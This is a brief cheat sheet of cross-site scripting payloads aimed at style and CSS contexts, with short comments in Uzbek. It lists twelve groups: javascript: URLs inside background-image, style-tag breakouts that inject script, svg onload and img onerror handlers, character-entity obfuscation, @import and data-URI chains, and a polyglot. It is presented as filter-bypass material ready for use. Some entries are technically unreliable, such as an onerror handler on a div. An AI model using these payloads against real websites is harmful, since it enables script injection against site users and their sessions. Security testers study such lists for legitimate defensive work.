🔥 ULTIMATE STYLE / CSS XSS (CLEAN)

⸻

1. CORE (LIMITED MODERN SUPPORT ⚠️)

<div style="background-image:url(javascript:alert(1))">
<div style='background-image:url("javascript:alert(1)")'>

👉 ko‘p browserlarda bloklangan, lekin ba’zi bypasslarda ishlaydi

⸻

2. STYLE TAG BREAKOUT (MUHIM)

<style></style><script>alert(1)</script>
<style><!--</style><script>alert(1)</script>


⸻

3. CSS → HTML BREAK (REAL)

</style><svg onload=alert(1)>
</style><img src=x onerror=alert(1)>


⸻

4. STYLE ATTRIBUTE + EVENT CHAIN

<div style="width:100%" onmouseover=alert(1)>
<div style="height:100%" onclick=alert(1)>


⸻

5. OBFUSCATED URL()

<div style="background-image:url(javascript:alert(String.fromCharCode(88,83,83)))">
<div style="background-image:url(&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1))">


⸻

6. @IMPORT ABUSE (LIMITED)

<style>@import url("javascript:alert(1)");</style>
<style>@import 'javascript:alert(1)';</style>


⸻

7. DATA URI CSS → HTML

<style>@import url("data:text/html,<script>alert(1)</script>");</style>


⸻

8. STYLE + SVG CHAIN (POWERFUL)

<style></style><svg onload=alert(1)>
<style>@import url("data:text/html,<svg onload=alert(1)>");</style>


⸻

9. ATTRIBUTE BYPASS

<div style=background-image:url(javascript:alert(1))>
<div style="background-image:url(javascript:alert(1))" >


⸻

10. POLYGLOT

</style></title><script>alert(1)</script>


⸻

11. MODERN CHAIN (REALISTIC)

<div style="background:url(x)" onerror=alert(1)>


⸻

12. RARE (CONTEXT DEPENDENT)

<style>body{background:url("javascript:alert(1)")}</style>

